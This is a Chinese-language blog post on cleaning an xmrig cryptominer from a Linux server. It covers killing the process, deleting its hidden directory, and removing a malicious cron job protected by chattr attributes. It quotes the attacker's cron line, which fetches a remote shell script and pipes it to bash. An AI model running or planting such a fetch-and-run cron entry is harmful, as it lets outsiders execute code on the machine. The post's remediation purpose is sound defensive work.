个人总结之xmrig 挖矿自动化程序如何彻底删除【Linux问题】
第一步 检查是否存在xmrig正在执行的进程# 在Linux 系统界面中执行 top
1 root 20 018534012584 8876 S 190.0 180.3 0:04.82 xmrig
正在被挖矿程序占用全部CPU等资源,导致本身业务无内存可用。
第二步 检察当前xmrig 文件在何处并删除
# 你可以获取 它的所在文件
find / -name xmrig
/etc/.system/php/xmrig
# 直接删除当前文件
rm -rf /etc/.system/php
# 然后kill掉当前正在运行的进程PID【就是刚刚查询到的进程PID】
kill -9 PID
这里是通过systemctl list-units --type=service | grep xmrig来进行查询当前系统服务并返回它运行状态
https://i-blog.csdnimg.cn/direct/da373e91e7ff4ff4baa996f269380ffe.png
你会发现上面的方式的确可以删除,但是过段时间进程依然存在
这个时候开始怀疑是否存在【定时任务】crontab来创建当进步程
第三步 检察是否存在定时任务来创建删除的文件和xmrig挖矿程序
就在此时,我们通过vim /etc/crontab
打开当前文件
打开文件
vim /etc/crontab
会发现存在若干针对不属于你当前的定时任务 例如
*/30 * * * * root cd1 -fsSL http://IP/php/php_8020.sh | bash
ps: 这里的IP就是那些挖矿程序的下载主机的IP
首先我们进行删除当前可执行文件中包含这种非常的定时任务【排除当前你自己写的定时任务】
ps:在删除后ESC,生存时发现当前文件没有修改权限
Operation not permitted
在退出检察时,并修改chmod 权限
chmod +x /etc/crontab
假如这里修改权限出现【chmod: changing permissions of ‘/etc/crontab’: Operation not permitted】
这里很有可能是挖矿人将这个定时任务文件进行移除不可变(i)和附加(a)属性
lsattr /etc/crontab
----ia--------e----- /etc/crontab
我们首先移除i 和a 属性
sudo chattr -i -a /etc/crontab
之后,你可以再实验修改文件权限:
sudo chmod 644 /etc/crontab
最后检察文件
lsattr /etc/crontab
文章到这里也接近尾声!有什么错误的地方希望指正。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]